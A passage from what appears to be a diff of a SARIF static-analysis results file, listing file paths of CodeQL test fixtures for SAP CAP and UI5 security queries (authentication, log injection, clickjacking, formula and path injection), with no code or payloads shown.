"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 54 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 55 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/privileged-user.js", + "uriBaseId" : "%SRCROOT%", + "index" : 56 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 57 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 58 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 59 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 60 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 61 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 62 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 63 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 64 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 65 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 66 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 67 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 68 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 69 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 70 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 71 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 72 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 73 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 74 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 75 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 76 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 77 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 78 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 79 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 80 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 81 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 82 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 83 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 84 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 85 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 86 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 87 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 88 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 89 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 90 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 91 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 92 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 93 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 94 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 95 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 96 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 97 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 98 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 99 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 100 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 101 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 102 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 104 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 105 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 107 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 109 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 110 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 111 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 112 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 113 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 115 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 116 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/lib/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 117 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/src/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 118 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/src/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 119 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 120 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 121 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 123 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", + "uriBaseId" : "%SRCROOT%", + "index" : 124 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", + "uriBaseId" : "%SRCROOT%", + "index" : 125 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 126 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/JsonParser/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 127 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 128 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 129 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 130 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 131 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 132 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 133 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 134 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 135 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 136 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 137 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 138 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 139 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 140 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 141 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 142 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 143 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 144 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 145 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 146 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 147 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 148 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 149 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 150 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 151 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 152 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 153 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 155 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 156 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 157 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 158 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 159 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 160 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 161 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 162 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 164 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 165 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 167 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 168 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 169 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 170 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 172 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 173 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 174 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 175 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 176 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 177 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 178 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 180 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 181 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 182 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 183 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 184 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 185 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 186 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 187 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 189 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 190 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 191 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 192 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 193 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 194 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 195 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 196 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 198 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 199 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", + "uriBaseId" : "%SRCROOT%", + "index" : 200 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 201 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 202 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 203 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 204 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 205 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 207 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 208 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 209 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 210 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 211 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 212 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 213 + } + }, { + "location" : { + "uri" : 